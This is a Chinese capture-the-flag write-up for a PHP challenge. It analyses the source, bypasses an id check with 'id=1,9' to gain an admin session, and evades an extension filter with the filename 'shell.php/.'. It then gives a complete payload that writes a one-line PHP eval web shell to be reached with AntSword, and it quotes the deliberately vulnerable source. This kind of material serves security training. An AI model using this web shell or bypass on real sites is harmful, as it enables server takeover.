|
这题就是单纯的源码分析,代码一共三段,第一段没什么好看的,page参数不是index.php就行,重点关注后两段,需要注意的点都写了注释了,那么,就总结一下
其实先执行的是第二段,对id参数进行了判断,id参数要有且浮点化第一位不能是1,1.0000和‘1’当然不等,最后一位得是‘9’,因此构造id=1,9
成功回显admin,那么有了admin权限,就可以判断第一段,文件路径是拼接来的,完整路径是uploaded/backup/文件名也是用户自己起,只不过正则过滤掉php,php3,
php4,php5,php7这几个后缀,但是因为$,他只在最后判断.php后缀,所以只要结尾的不是.php就可以过这个正则
构造shell.php/.,当linux读取到shell.php会自动调用php程序去处理,/.表示调用shell.php文件本身,因此我们的文件也就传了上去,成功写入,后面就是菜刀或者蚁剑连接
就好
给一个完整payload index.php?page=flag.php&id=1,9
POST数据:con=<?php @eval($_POST['nihao']); ?>&file=shell.php/.
<?php
if ($_SESSION['admin']) {
$con = $_POST['con'];
$file = $_POST['file'];
$filename = "backup/".$file;
if(preg_match('/.+\.ph(p[3457]?|t|tml)$/i', $filename)){
die("Bad file extension");
}else{
chdir('uploaded');
$f = fopen($filename, 'w');
fwrite($f, $con);
fclose($f);
}
}
?>
<?php
if (isset($_GET[id]) && floatval($_GET[id]) !== '1' && substr($_GET[id], -1) === '9') {
include 'config.php';
$id = mysql_real_escape_string($_GET[id]);
$sql="select * from cetc007.user where id='$id'";
$result = mysql_query($sql);
$result = mysql_fetch_object($result);
} else {
$result = False;
die();
}
if(!$result)die("<br >something wae wrong ! <br>");
if($result){
echo "id: ".$result->id."</br>";
echo "name:".$result->user."</br>";
$_SESSION['admin'] = True;
}
?>
那个视频里我最后蚁剑连不上是因为把con错写成了conn,做法没问题,大家注意一下就好
参考视频链接:https://www.bilibili.com/video/BV1Hv411A7GQ/
|